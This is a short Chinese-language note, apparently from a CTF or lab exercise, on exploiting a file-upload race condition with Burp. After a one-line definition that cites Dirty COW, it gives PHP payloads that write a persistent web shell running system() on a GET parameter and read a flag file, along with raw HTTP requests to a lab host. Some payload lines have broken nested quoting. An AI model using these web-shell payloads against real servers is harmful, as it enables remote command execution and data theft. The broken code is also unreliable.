Race condition

条件竞争漏洞（Race condition）官方概念是“发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。” 这个漏洞存在于操作系统、数据库、web等多个层面，像有名的脏牛（dirty cow）。 用Burp 同时发存储文件的php，和对这个php文件的请求

<?php file_put_contents('xxxpersist.php', '<?php system($_GET[1]);'); ?>
<?php file_put_contents('xxxpersist.php', '<?php readfile('/var/www/html/flag.php');'); ?>

存储文件的php

GET /race2.php HTTP/1.1
Host: 192.168.8.226:8080
<?php file_put_contents('persis.php', '<?php readfile('/var/www/html/flag.php');'); ?>

这个php文件的请求

GET /persis.php HTTP/1.1
Host: 192.168.8.226:8080